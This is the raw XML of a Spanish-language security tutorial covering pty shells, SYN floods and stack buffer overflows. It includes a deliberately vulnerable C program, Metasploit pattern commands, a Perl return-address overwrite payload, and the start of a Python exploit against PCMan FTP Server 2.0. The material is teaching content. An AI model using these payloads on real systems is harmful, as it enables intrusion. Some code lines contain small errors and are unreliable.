          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en el espacio de nombres del programa. El módulo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proporciona un conjunto de funciones y herramientas para controlar pseudo terminales (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) en sistemas Unix. En particular, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty.spawn()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una función del módulo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">que se utiliza para invocar un shell interactivo, como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, dentro de una sesión de terminal existente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="113" w:before="113" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rb7w5jh0pig3" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Denegación de Servicio</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 ataque de denegación de servicio (DoS, por sus siglas en inglés) es una forma de interrumpir intencionalmente el servicio de un servidor enviándole tantas solicitudes que, no siendo capaz de responder a todas, colapse. El objetivo, por lo tanto, es sobrecargar el sistema y hacer que no pueda responder a las solicitudes legítimas.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SYN flood es una forma específica de ataque de denegación de servicio en la qu eel objetivo es abrumar un servidor con una gran cantidad de solicitudes SYN falsas.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este tipo de  ataque, el atacante envía una gran cantidad de solicitudes SYN al servidor, pero no responde a los paquetes SYN-ACK que envía éste. Al no recibir una respuesta de ACK, el servidor mantiene la conexión pendiente y reserva recursos para ella. Con un volumen suficientemente grande de solicitudes SYN no respondidas, el servidor puede agotar sus recursos y no poder procesar las solicitudes legítimas; explicado de otra forma: al inundar el servidor con solicitudes SYN sin responder, el atacante puede agotar los recursos del servidor y hacer que no pueda aceptar nuevas conexiones legítimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="120" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:smallCaps w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.23w4lvgdwpy2" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer Overflow</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buffer overflow es una vulnerabilidad que se da cuando un programa intenta almacenar más datos de los que un búfer (buffer) puede contener, lo que puede llevar a que esos datos sobrescriban regiones de memoria adyacentes y causen comportamientos no deseados o incluso la ejecución de código malicioso. Es una fallo de seguridad común en muchos programas y sistemas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Vamos a suponer que tenemos un programa (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overflow.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) con el siguiente código sencillísimo en lenguaje C: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">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void flujo_cambiado ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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ab/>
        <w:t xml:space="preserve">printf (“Esta línea no debería ejecutarse”). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">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int main(int argc, char **argv) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">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    char cadena[64];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">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    gets (cadena);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">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vemos, en la función principal se ejecutan dos líneas, y el programa no hace nada más. Ahora bien, ¿es posible cambiar el flujo normal de ese programa? La respuesta es SÍ, llevando a cabo un proceso de ingeniería inversa, que, en el contexto de la programación, la se refiere a la técnica de descomponer un programa en sus componentes individuales y analizarlos para comprender su funcionamiento y detectar posibles vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">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Vamos a ello. Antes de nada, generaremos un fichero ejecutable (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overflow_exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) a partir del archivo en C. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">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gcc -o overflow_exe overflow.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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729968" cy="742446"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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29968" cy="742446"/>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1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los sistemas x86 existe un registro de nombre EIP cuyo contenido es una dirección de memoria que apunta a la siguiente instrucción que debe ejecutarse. ¿Cómo podemos hacer que el EIP apunte a la dirección en la que se encuentra la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flujo_cambiado</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, cuyo contenido jamás debería ejecutarse? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">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primero que vamos a hacer es intentar conocer el contenido del registro EIP. Para empezar,  generaremos un patrón de 200 caracteres aleatorios. El archivo pattern_create.rb es un script en Ruby que se utiliza para crear patrones de caracteres. Para ejecutarlo, ejecutaremos este comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">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792028" cy="314325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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92028"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GDB (GNU Debugger) es un depurador de sistemas que te permite analizar un programa en ejecución, detenerlo, examinar su estado y continuar su ejecución. Lo vamos a utilizar con el ejecutable generado, pasándole como argumento el patrón creado, que es mucho más grande que los 64 bytes que admite la variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer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15">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gdb --quiet ./overflow_exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">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1549400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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97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dirección de retorno es la dirección a la que debe retornar la ejecución al volver de la función a la que hemos llamado (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, en este caso). ¿Para qué nos sirve eso? Para modificarla indicándole que la dirección a la que debe volver es ésa en la que comienza la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flujo_cambiado)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Podemos pensar que la dirección de retorno está 64 bytes más allá de la que recoge el EIP, pero lo cierto es que no suele ser así, ya que suele haber bytes nulos por medio. Trataremos ahora de encontrar el offset, el desplazamiento o distancia que hay entre el EIP y la dirección de retorno:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x004011ff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">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Supongamos que el resultado es 76; es decir, 76 bytes. Pues bien, con eso ya conocemos el desplazamiento. Buscaremos ahora la dirección de memoria en la que se halla la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flujo_cambiado</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1A">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objdump -d overflow_exe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">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925253" cy="1211498"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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25253" cy="121149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629978" cy="1664540"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17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29978" cy="166454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Ejecutaremos ahora el siguiente comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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perl -e ‘print “A”x76 . “\x99\x11\x00\x00”’ | ./poc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">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277678" cy="279143"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17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77678" cy="27914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la anterior instrucción en lenguaje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, escribimos la dirección de la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flujo_cambiado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en formato</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> little endian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, tras haber introducido 76 caracteres “A”; es decir, sobreescribimos la dirección de memoria en la que se encuentra la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flujo_cambiado</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el lugar en el que debería ir la dirección de retorno legítima. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">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360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792" w:right="0" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.e9o9784la538" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba de concepto real</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">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Encontramos un script de Python que lanza una explotación contra un servidor FTP llamado PCMan FTP Server versión 2.0; éste  es vulnerable a un buffer overflow al introducir un valor demasiado largo en el comando PORT. En este enlace tenemos información acerca del exploit, así como el código del propio script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/40714</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="680" w:before="0" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="-660" w:right="-660" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="0"/>
          <w:color w:val="9a9a9a"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.cwk0lmoays02" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">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6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="276"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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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print "Creating malicious input!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">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junk = '\x41'*2007</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">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ret="\xf7\x56\x3c\x7e"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#User32.dll 7E3C56F7</w:t>
      </w:r>
    </w:p>
